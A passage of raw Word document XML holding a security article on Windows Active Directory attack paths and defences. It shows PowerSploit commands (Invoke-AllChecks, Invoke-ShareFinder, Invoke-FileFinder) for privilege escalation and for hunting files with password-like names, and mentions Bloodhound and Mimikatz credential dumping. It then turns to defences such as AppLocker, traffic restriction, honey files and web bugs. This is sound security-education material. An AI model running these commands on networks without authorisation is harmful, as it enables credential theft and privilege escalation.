      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module in PowerShell here but PowerShell Empire also has the module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>builtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so when you establish an agent using Empire you can invoke it remotely.</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; import-module ./powerup.ps1</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Allchecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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The use one of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>builtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit any discovered vulnerabilities.</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Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FileFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerSploit’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to scour the domain looking for juicy files that you have access to. By default, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FileFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will flag files that files with ‘pass’, ‘sensitive’,  ‘secret’, ‘admin’, ‘login’, or ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unattend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*.xml’ in the name but search criteria is configurable.</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CheckShareAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Verbose -Threads 20 | </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 xml:space="preserve">Out-File -Encoding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> interesting-shares.txt</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FileFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ShareList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> .\interesting-shares.txt -Verbose -Threads </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="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153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>20 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> juicy_files.csv</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bloodhound</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that automates the process of finding a path to an elevated AD account. It uses PowerShell to query Active Directory and then creates a graph showing the available accounts/computers that the attacker can gain access to in order to dump credentials from memory (for example with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). The dumped credentials will provide privilege escalation perhaps all the way up to domain administrator.</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Restricting Client to Client Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> – We have only worked with a couple of organizations that implement this level of control and it was very effective in restricting our ability to pivot. Unfortunately, we do not have many references to offer regarding how to implement this level of security but it is reasonable to assume that granular NTFS permissions and host-based firewall rules are part of the recipe.</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W^X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– Refers to only allowing users to write in locations that are not executable and only allow applications to be executed in locations where they are not allowed to write.  The latter can be enforced with AppLocker. In fact, default AppLocker rules allow execution only from the Program Files directory and the Windows directory, which users by default do not have write access to.  It would be worth auditing those locations for any permission changes when implementing AppLocker.</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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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Empire – </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adaptivethreat/Empire</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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Bloodhound – </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=MYxk73DsGQI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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Bloodhound – </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://wald0.com/?p=68</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.blackhillsinfosec.com/?p=4667</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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LAPS – </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/mt227395.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Defense </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This refers to making the attacker’s job more difficult and confusing.  It does not refer to “hacking back”.  (Hacking back by most definitions would be illegal)  Injecting a little bit of chaos and unpredictability goes a long way to confounding and slowing down attackers.  Most people have heard of honeypots but what about honey files, honey accounts, honey tokens and other lovely goodies. ADHD is an active defense distribution put together by BHIS and available for free </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Web Bugs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> are hidden elements in a web page like a 1X1 pixel image that gets loaded from a web bug server.  The server collects identifying information like IP address, User Agent and Timestamp. The web bug can be embedded in a .DOC file with a juicy sounding file name like ProjectedSalaries-2017.doc or Passwords.doc.  When the attacker takes the bait, the identifying info is logged.</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hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Weblabyrinth</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>creates a maze of fake web pages with the goal of confusing automated web scanners.</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Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Honeyports</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to catch and </w:t>
      </w:r>
